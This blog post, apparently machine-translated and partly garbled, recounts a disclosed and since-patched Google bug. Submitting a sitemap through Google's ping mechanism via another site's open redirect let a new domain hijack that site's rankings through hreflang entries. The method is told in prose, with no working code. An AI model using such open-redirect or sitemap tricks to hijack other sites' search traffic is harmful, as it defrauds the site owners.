- Avoid black hat pits on regular websites that cannot be mistaken
- Multi-channel, deep understanding of how search engines work
- Help understand where the limits of the search ranking algorithm are
- Develop white hat skills from smart black hat SEO techniques
I have done some research on the websites and rankings of domestic black hat SEO, such as gambling and pornography, and have some contacts with related companies. I admire the industry’s profit, team size, exploration and application. Of. In general, however, the practice of domestic black hat SEO is biased towards tradition, and more is the extreme and large-scale use of certain known vulnerabilities or parameters of search algorithms. The exploration of SEO by some foreign black hats is even more unexpected, and the brain hole is even stranger.
A few days ago I saw an example that could be used for Black Hat SEO, using Google Search Console’s XML Sitemap to submit vulnerabilities and hijacking the original rankings of other people’s websites. After reading it, I feel that there is such an operation? Some people are really very active in thinking, seemingly have time, and constantly explore various possibilities. Fortunately, this vulnerability was not actually used in Black Hat SEO, but was submitted in Google’s vulnerability reporting reward program, and the discoverer Tom Anthony received a $1,337 prize.
Tom Anthony is not a general IT security officer, apparently a dry SEO, and the head of the Distilled product development department of the famous British SEO company. Tom Anthony details the use of this vulnerability in his blog post.
Simply put, Tom Anthony uses his own website to submit an XML version of Sitemap to Google using ping mechanism (which contains index directives, such as the hreflang tag used in this example). Due to vulnerabilities in Google and other websites, Google mistakenly thought that this Sitemap is Another site’s Sitemap, which allows Tom Anthony’s website to quickly index and hijack the ranking of that site.
Google allows several ways to submit sitemap.xml:
- Specify the location of sitemap.xml in the robots.txt file
- Submit in the background in Google Search Console
- Ping the location of sitemap.xml to Google
The third way to ping is to send a get request to this URL of Google:
Among them, http://www.example.com/sitemap.xml is the file of the sitemap.xml to be submitted. Tom Anthony found that Google would come over and crawl the sitemap.xml file in more than 10 seconds after receiving the request, regardless of the old and new sites.
The next step is to take advantage of the open redirect vulnerability of some websites, which is completely open and can point to other websites. Some websites can control the steering through the parameters in the URL, such as the user is redirected to a specified address after login:
That is, the website user of abc is redirected to the page.html page after login, and continues to access normally. Usually, the page.html page should be on the abc.com domain name. However, some websites are not very secure and can be redirected to other websites, such as:
After logging in, the user was redirected to another website, xyz.com. And it doesn’t have to be a real login. Just visit the URL, which can be login?, or logout?, or any other script.php?, it will be turned.
This is the open turn. This open turn is quite common, including big sites.
Tom Anthony registered a new domain name, xyz.com, and then used these two vulnerabilities to submit such a sitemap.xml to Google via ping:
Xyz.com is his own newly registered domain name, and abc.com is a website that supports open-ended, well-searched traffic. Obviously, the sitemap.xml file is placed on xyz.com, but Google treats this file as a sitemap file for abc.com (the domain name before the turn). In this way, the black hat SEO can control other people’s website sitemap files and use some commands to hijack weights, rankings, and traffic.
Tom Anthony did a lot of testing, and the success was the hreflang instruction. He chose a British retailer website (as the abc.com domain name in the above example), in order to protect the other party, did not say which website, collected the other website, including structure and content, on his own xyz.com domain name. Only information such as address and currency has been modified. Then put the sitemap.xml file in the xyz.com domain name, which lists the URL of the UK website, but each URL adds a hreflang command to the multi-language website to notify Google that the US version of the UK website page is On xyz.com. Finally, as mentioned earlier, the sitemap.xml file on xyz.com is submitted using the ping mechanism, but Google mistakenly thinks it is the legal sitemap.xml file of the UK website abc.com.
As a result, Google passed the weight of the UK website to the xyz.com domain. Tom Anthony is not very clear here, but I understand that it is the weight and ranking that the UK website should have on Google.co.uk on Google.com.
Within 48 hours, the new domain name is indexed and gets some long tails:
In a few days, important business words were also ranked, and compared with Amazon, Toys R Us, Wal-Mart, etc.:
Tom Anthony deliberately stated that it is really only a 6-day domain name, there is no external chain, and the content is still collected.
Tom Anthony then found that the xyz.com Google Search Console account shows that the UK website was displayed in the outer chain of xyz.com (there is no link, people are not sure if there is such a thing), more serious Yes, Tom Anthony can submit the sitemap.xml file for that UK site in the Google Search Console account on xyz.com without pinging it. Google seems to treat these two unrelated websites as one or at least related.
Tom Anthony also tested other instructions, such as no index (framing competitors invisible), rel-canonical, but it didn’t work. Tom Anthony also thought about testing other things, such as whether the structure and content of xyz.com website is the same as abc.com? To what extent does it work?
Another interesting point is that the hijacked website may not know what happened at all. Some negative SEO techniques that frame competitors can be discovered, such as creating many spam links for an opponent, which is clearly shown in multiple tools. The vulnerability discovered by Tom Anthony, the hijacked website could not find out what was going on. Or I don’t know if I was hijacked. For example, the British website in this case is not operated in the United States, so I may not go to Google’s US ranking at all.
On September 23, 2017, Tom Anthony submitted the bug. After some discussions, on March 25, 2018, Google confirmed that the bug had been fixed and agreed to post a blog post by Tom Anthony.
The search engine land article also has a large section of text describing Tom Anthony’s mental journey. Why not use this vulnerability for your own use, but submit it to Google? Compared to the potential traffic and benefits, the bonus of more than $1,000 is nothing. Feelings. Interested can be read in depth.
Finally, Google’s comment on this vulnerability is, “When this vulnerability is discovered, they have resolved to organize relevant teams. This is a newly discovered vulnerability that I believe has not been used.”